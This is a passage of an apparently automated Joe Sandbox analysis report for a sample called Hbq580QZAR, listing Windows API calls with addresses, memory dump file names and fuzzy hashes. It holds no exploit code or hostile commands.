                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                            • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                            • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 1177325624-0
                                                                                            • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                            • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0048397A
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$IconicLong
                                                                                            • String ID:
                                                                                            • API String ID: 2754861897-0
                                                                                            • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                            • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                            • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                            • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                            • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                            • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                            • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2737653267.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2737498721.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2737869507.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2737653267.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2737498721.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2737869507.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                              • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
